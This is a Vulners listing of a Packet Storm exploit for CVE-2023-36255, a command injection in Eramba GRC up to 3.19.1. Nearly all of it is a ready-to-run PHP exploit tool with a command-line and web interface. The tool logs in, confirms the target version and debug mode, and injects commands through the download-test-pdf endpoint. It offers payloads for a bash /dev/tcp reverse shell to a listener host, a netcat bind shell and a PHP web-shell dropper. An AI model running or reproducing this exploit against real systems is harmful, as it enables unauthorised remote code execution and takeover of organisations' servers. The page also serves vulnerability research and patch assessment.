Vulners
Lucene search
๐ Eramba GRC 3.19.1 Command Injection
๐๏ธย 12 Dec 2025ย 00:00:00Reported byย indoushkaTypeย 
ย packetstorm๐ย packetstorm.news๐ย 135ย Views
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Eramba 3.19.1 Remote Command Execution Exploit | 1 Aug 202300:00 | โ | zdt |
 | CVE-2023-36255 | 3 Aug 202302:15 | โ | attackerkb |
 | CVE-2023-36255 | 25 Mar 202518:01 | โ | circl |
 | Eramba Code Injection Vulnerability | 1 Aug 202300:00 | โ | cnnvd |
 | CVE-2023-36255 | 3 Aug 202300:00 | โ | cve |
 | CVE-2023-36255 | 3 Aug 202300:00 | โ | cvelist |
 | Eramba (up to 3.19.1) Authenticated Remote Code Execution Module | 25 Mar 202518:53 | โ | metasploit |
 | CVE-2023-36255 | 3 Aug 202302:15 | โ | nvd |
| Eramba 3.19.1 Remote Command Execution | 1 Aug 202300:00 | โ | packetstorm |
| Eramba Remote Code Execution | 26 Mar 202500:00 | โ | packetstorm |
10
=============================================================================================================================================
| # Title : Eramba GRC platform 3.19.1 Command injection in download-test-pdf endpoint |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.eramba.org/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/190048/ & CVE-2023-36255
[+] Summary :
Critical authenticated remote code execution vulnerability in Eramba GRC platform (versions up to 3.19.1)
allowing command injection through the download-test-pdf endpoint when debug mode is enabled.
[+] POC :
php poc.php or http://127.0.0.1/poc.php
<?php
/*
* by : indoushka based on Metasploit module
*/
class ErambaExploit {
private $target;
private $port;
private $ssl;
private $base_path;
private $timeout;
private $cookies;
private $username;
private $password;
public function __construct($target, $port = 8443, $ssl = true, $base_path = '/', $username = 'admin', $password = 'admin') {
$this->target = $target;
$this->port = $port;
$this->ssl = $ssl;
$this->base_path = rtrim($base_path, '/');
$this->timeout = 30;
$this->cookies = [];
$this->username = $username;
$this->password = $password;
}
/**
* Check if target is vulnerable
*/
public function check() {
echo "[*] Checking Eramba vulnerability...\n";
$res = $this->send_request('/login', 'GET');
if (!$res || $res['code'] != 200) {
echo "[-] Failed to access login page\n";
return "unknown";
}
// Extract version from HTML
$version = $this->extract_version($res['body']);
if (!$version) {
echo "[-] Could not determine Eramba version\n";
return "unknown";
}
echo "[*] Detected Eramba version: $version\n";
// Check if debug mode is enabled
$debug_enabled = $this->check_debug_mode($res['body']);
if (!$debug_enabled) {
echo "[-] Debug mode is not enabled - target is not vulnerable\n";
return "safe";
}
echo "[+] Debug mode is enabled\n";
// Check version against vulnerable range
if ($this->is_version_vulnerable($version)) {
echo "[+] โ Eramba version $version is vulnerable\n";
return "vulnerable";
} else {
echo "[-] Eramba version $version is not affected\n";
return "safe";
}
}
/**
* Extract version from HTML
*/
private function extract_version($html) {
// Look for version pattern: <p>App version <strong>X.X.X</strong>
if (preg_match('/App version\s*<strong>([0-9]+\.[0-9]+\.[0-9]+)<\/strong>/i', $html, $matches)) {
return $matches[1];
}
return null;
}
/**
* Check if debug mode is enabled
*/
private function check_debug_mode($html) {
// Look for debug token field
return strpos($html, 'name="_Token[debug]"') !== false;
}
/**
* Check if version is vulnerable
*/
private function is_version_vulnerable($version) {
$version_parts = explode('.', $version);
$major = intval($version_parts[0]);
$minor = intval($version_parts[1]);
$patch = intval($version_parts[2]);
// Vulnerable: versions up to 3.19.1
if ($major < 3) return true;
if ($major == 3) {
if ($minor < 19) return true;
if ($minor == 19 && $patch <= 1) return true;
}
return false;
}
/**
* Login to Eramba
*/
private function login() {
echo "[*] Attempting to login...\n";
// First GET request to get tokens
$res = $this->send_request('/login', 'GET', [], null, [], true);
if (!$res || $res['code'] != 200) {
echo "[-] Failed to access login page\n";
return false;
}
// Extract CSRF and token fields
$tokens = $this->extract_tokens($res['body']);
if (!$tokens) {
echo "[-] Could not extract authentication tokens\n";
return false;
}
echo "[*] Extracted CSRF token and form tokens\n";
// Perform login
$login_data = [
'_csrfToken' => $tokens['csrf'],
'login' => $this->username,
'password' => $this->password,
'_Token[fields]' => $tokens['fields'],
'_Token[unlocked]' => $tokens['unlocked'],
'_Token[debug]' => $tokens['debug']
];
$res = $this->send_request('/login', 'POST', [], http_build_query($login_data), [
'Content-Type: application/x-www-form-urlencoded'
], true);
if (!$res || $res['code'] != 200) {
echo "[-] Login failed - invalid credentials or server error\n";
return false;
}
// Check if login was successful by looking for dashboard
if (strpos($res['body'], 'Landing Dashboard') !== false) {
echo "[+] Successfully logged in as {$this->username}\n";
return true;
} else {
echo "[-] Login failed - check credentials\n";
return false;
}
}
/**
* Extract tokens from HTML form
*/
private function extract_tokens($html) {
$tokens = [];
// Extract CSRF token
if (preg_match('/name="_csrfToken"\s+value="([^"]+)"/', $html, $matches)) {
$tokens['csrf'] = $matches[1];
}
// Extract token fields
if (preg_match('/name="_Token\[fields\]"\s+value="([^"]+)"/', $html, $matches)) {
$tokens['fields'] = $matches[1];
}
// Extract token unlocked
if (preg_match('/name="_Token\[unlocked\]"\s+value="([^"]+)"/', $html, $matches)) {
$tokens['unlocked'] = $matches[1];
}
// Extract token debug
if (preg_match('/name="_Token\[debug\]"\s+value="([^"]+)"/', $html, $matches)) {
$tokens['debug'] = $matches[1];
}
if (count($tokens) == 4) {
return $tokens;
}
return false;
}
/**
* Execute the exploit
*/
public function exploit($payload_type = 'reverse_shell', $lhost = null, $lport = null) {
echo "[*] Starting Eramba exploitation...\n";
// Step 1: Login
if (!$this->login()) {
echo "[-] Authentication failed\n";
return false;
}
// Step 2: Generate payload
$payload = $this->generate_payload($payload_type, $lhost, $lport);
if (!$payload) {
echo "[-] Failed to generate payload\n";
return false;
}
echo "[*] Generated payload: " . htmlspecialchars($payload) . "\n";
// Step 3: Execute via download-test-pdf endpoint
echo "[*] Executing payload via download-test-pdf endpoint...\n";
$res = $this->send_request('/settings/download-test-pdf', 'GET', [
'path' => $payload
]);
if ($res) {
echo "[+] โ Payload sent successfully\n";
echo "[*] Check your listener for connection\n";
return true;
} else {
echo "[-] Failed to execute payload\n";
return false;
}
}
/**
* Generate payload commands
*/
private function generate_payload($type, $lhost, $lport) {
switch ($type) {
case 'reverse_shell':
if (!$lhost || !$lport) {
echo "[-] IP and port required for reverse shell\n";
return false;
}
// Bash reverse shell
return "bash -c 'bash -i >& /dev/tcp/{$lhost}/{$lport} 0>&1'";
case 'bind_shell':
if (!$lport) {
echo "[-] Port required for bind shell\n";
return false;
}
return "nc -lvp {$lport} -e /bin/bash";
case 'command':
return 'id; whoami; uname -a; pwd';
case 'web_shell':
// This would create a web shell file
$filename = $this->random_text(8) . '.php';
$web_shell = '<?php if(isset($_REQUEST["cmd"])){ system($_REQUEST["cmd"]); } ?>';
return "echo '{$web_shell}' > /tmp/{$filename}";
default:
return 'id; whoami; hostname';
}
}
/**
* Send HTTP request
*/
private function send_request($path, $method = 'GET', $params = [], $data = null, $custom_headers = [], $save_cookies = false) {
$url = $this->build_url($path);
if ($method == 'GET' && !empty($params)) {
$url .= '?' . http_build_query($params);
}
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => $this->timeout,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
CURLOPT_HEADER => true,
CURLOPT_CUSTOMREQUEST => $method,
CURLOPT_FOLLOWLOCATION => false
]);
// Add POST data if provided
if ($method == 'POST' && $data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
// Build headers
$headers = array_merge([
'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36'
], $custom_headers);
// Add cookies if available
$cookie_header = $this->build_cookie_header();
if ($cookie_header) {
$headers[] = $cookie_header;
}
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
// Save cookies if requested
if ($save_cookies && $response) {
$this->extract_cookies($response);
}
curl_close($ch);
if ($response) {
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $header_size);
$body = substr($response, $header_size);
return [
'code' => $http_code,
'headers' => $headers,
'body' => $body
];
}
return false;
}
/**
* Extract cookies from response headers
*/
private function extract_cookies($response) {
if (preg_match_all('/Set-Cookie:\s*([^=]+)=([^;]+)/i', $response, $matches)) {
for ($i = 0; $i < count($matches[1]); $i++) {
$this->cookies[trim($matches[1][$i])] = $matches[2][$i];
}
}
}
/**
* Build cookie header from stored cookies
*/
private function build_cookie_header() {
if (empty($this->cookies)) {
return null;
}
$cookie_parts = [];
foreach ($this->cookies as $name => $value) {
$cookie_parts[] = "{$name}={$value}";
}
return 'Cookie: ' . implode('; ', $cookie_parts);
}
/**
* Generate random text
*/
private function random_text($length = 8) {
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$result = '';
for ($i = 0; $i < $length; $i++) {
$result .= $chars[rand(0, strlen($chars) - 1)];
}
return $result;
}
/**
* Build full URL
*/
private function build_url($path) {
$protocol = $this->ssl ? 'https' : 'http';
$full_path = $this->base_path . $path;
return "{$protocol}://{$this->target}:{$this->port}{$full_path}";
}
}
// CLI Interface
if (php_sapi_name() === 'cli') {
echo "
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Eramba RCE Exploit โ
โ CVE-2023-36255 โ
โ PHP Implementation โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
\n";
$options = getopt("t:p:s:u:U:P:cL:H:", [
"target:",
"port:",
"ssl",
"uri:",
"username:",
"password:",
"check",
"lhost:",
"lport:"
]);
$target = $options['t'] ?? $options['target'] ?? null;
$port = $options['p'] ?? $options['port'] ?? 8443;
$ssl = isset($options['s']) || isset($options['ssl']);
$base_uri = $options['u'] ?? $options['uri'] ?? '/';
$username = $options['U'] ?? $options['username'] ?? 'admin';
$password = $options['P'] ?? $options['password'] ?? 'admin';
$check_only = isset($options['c']) || isset($options['check']);
$lhost = $options['H'] ?? $options['lhost'] ?? null;
$lport = $options['L'] ?? $options['lport'] ?? 4444;
if (!$target) {
echo "Usage: php eramba_exploit.php [options]\n";
echo "Options:\n";
echo " -t, --target Target host (required)\n";
echo " -p, --port Target port (default: 8443)\n";
echo " -s, --ssl Use SSL (default: true)\n";
echo " -u, --uri Base URI path (default: /)\n";
echo " -U, --username Username (default: admin)\n";
echo " -P, --password Password (default: admin)\n";
echo " -c, --check Check only (don't exploit)\n";
echo " -H, --lhost Listener host for reverse shell\n";
echo " -L, --lport Listener port for reverse shell (default: 4444)\n";
echo "\nExamples:\n";
echo " php eramba_exploit.php -t 192.168.1.100 -c\n";
echo " php eramba_exploit.php -t eramba.company.com -U admin -P password -H 10.0.0.5 -L 4444\n";
exit(1);
}
$exploit = new ErambaExploit($target, $port, $ssl, $base_uri, $username, $password);
if ($check_only) {
$result = $exploit->check();
echo "\n[*] Result: {$result}\n";
} else {
if ($exploit->exploit('reverse_shell', $lhost, $lport)) {
echo "[+] Exploitation completed successfully\n";
} else {
echo "[-] Exploitation failed\n";
}
}
} else {
// Web Interface
$action = $_POST['action'] ?? '';
if ($action === 'check' || $action === 'exploit') {
$target = $_POST['target'] ?? '';
$port = $_POST['port'] ?? 8443;
$ssl = isset($_POST['ssl']);
$base_uri = $_POST['uri'] ?? '/';
$username = $_POST['username'] ?? 'admin';
$password = $_POST['password'] ?? 'admin';
$payload_type = $_POST['payload_type'] ?? 'command';
$lhost = $_POST['lhost'] ?? '';
$lport = $_POST['lport'] ?? 4444;
if (empty($target)) {
echo "<div style='color: red; padding: 10px; border: 1px solid red; margin: 10px;'>Target host is required</div>";
} else {
$exploit = new ErambaExploit($target, $port, $ssl, $base_uri, $username, $password);
ob_start();
if ($action === 'check') {
$exploit->check();
} else {
$exploit->exploit($payload_type, $lhost, $lport);
}
$output = ob_get_clean();
echo "<pre style='background: #f4f4f4; padding: 15px; border: 1px solid #ddd; border-radius: 4px;'>$output</pre>";
}
echo '<a href="' . htmlspecialchars($_SERVER['PHP_SELF']) . '" style="display: inline-block; padding: 10px 20px; background: #007cba; color: white; text-decoration: none; border-radius: 4px; margin: 10px 0;">Back to Form</a>';
} else {
// Display the form
echo '<!DOCTYPE html>
<html>
<head>
<title>Eramba RCE Exploit - CVE-2023-36255</title>
<meta charset="UTF-8">
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 20px;
background: #f5f5f5;
}
.container {
max-width: 800px;
margin: 0 auto;
background: white;
padding: 30px;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0,0,0,0.1);
}
h1 {
color: #333;
border-bottom: 2px solid #007cba;
padding-bottom: 10px;
}
h3 {
color: #666;
}
.form-group {
margin-bottom: 20px;
}
label {
display: block;
margin-bottom: 8px;
font-weight: bold;
color: #333;
}
input[type="text"], input[type="password"], select {
width: 100%;
padding: 10px;
border: 1px solid #ddd;
border-radius: 4px;
box-sizing: border-box;
font-size: 14px;
}
.checkbox-group {
display: flex;
align-items: center;
gap: 10px;
}
button {
background: #007cba;
color: white;
padding: 12px 25px;
border: none;
border-radius: 4px;
cursor: pointer;
margin-right: 10px;
font-size: 16px;
transition: background 0.3s;
}
button:hover {
background: #005a87;
}
.danger {
background: #dc3545;
}
.danger:hover {
background: #c82333;
}
.info {
background: #17a2b8;
}
.info:hover {
background: #138496;
}
.warning-box {
background: #fff3cd;
border: 1px solid #ffeaa7;
color: #856404;
padding: 15px;
border-radius: 4px;
margin: 20px 0;
}
.info-box {
background: #d1ecf1;
border: 1px solid #bee5eb;
color: #0c5460;
padding: 15px;
border-radius: 4px;
margin: 20px 0;
}
</style>
</head>
<body>
<div class="container">
<h1>Eramba RCE Exploit</h1>
<h3>CVE-2023-36255 - Authenticated Remote Code Execution</h3>
<div class="warning-box">
<strong>โ ๏ธ Educational Use Only:</strong> This tool demonstrates a critical vulnerability in Eramba.
Use only on systems you own or have explicit permission to test.
</div>
<form method="post">
<div class="form-group">
<label for="target">Target Host:</label>
<input type="text" id="target" name="target" placeholder="192.168.1.100 or eramba.company.com" required>
</div>
<div class="form-group">
<label for="port">Port:</label>
<input type="text" id="port" name="port" value="8443">
</div>
<div class="form-group">
<label for="uri">Base URI:</label>
<input type="text" id="uri" name="uri" value="/">
</div>
<div class="form-group">
<div class="checkbox-group">
<input type="checkbox" id="ssl" name="ssl" checked>
<label for="ssl" style="display: inline; font-weight: normal;">Use SSL</label>
</div>
</div>
<div class="form-group">
<label for="username">Username:</label>
<input type="text" id="username" name="username" value="admin" required>
</div>
<div class="form-group">
<label for="password">Password:</label>
<input type="password" id="password" name="password" value="admin" required>
</div>
<div class="form-group">
<label for="payload_type">Payload Type:</label>
<select id="payload_type" name="payload_type">
<option value="command">Test Command</option>
<option value="reverse_shell">Reverse Shell</option>
<option value="bind_shell">Bind Shell</option>
<option value="web_shell">Web Shell</option>
</select>
</div>
<div class="form-group">
<label for="lhost">Listener Host (for reverse shell):</label>
<input type="text" id="lhost" name="lhost" placeholder="Your IP address: 192.168.1.100">
</div>
<div class="form-group">
<label for="lport">Listener Port (for reverse shell):</label>
<input type="text" id="lport" name="lport" value="4444">
</div>
<button type="submit" name="action" value="check" class="info">Check Vulnerability</button>
<button type="submit" name="action" value="exploit" class="danger">Execute Exploit</button>
</form>
<div class="info-box">
<h3>About CVE-2023-36255:</h3>
<p><strong>Vulnerability:</strong> Command injection in download-test-pdf endpoint</p>
<p><strong>Affected Versions:</strong> Eramba up to 3.19.1</p>
<p><strong>Prerequisites:</strong> Debug mode must be enabled</p>
<p><strong>Authentication:</strong> Requires valid user credentials</p>
<p><strong>Endpoint:</strong> /settings/download-test-pdf</p>
<p><strong>Parameter:</strong> path (command injection)</p>
<p><strong>Impact:</strong> Authenticated Remote Code Execution</p>
</div>
</div>
</body>
</html>';
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Dec 2025 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.18.8
EPSS0.89153
SSVC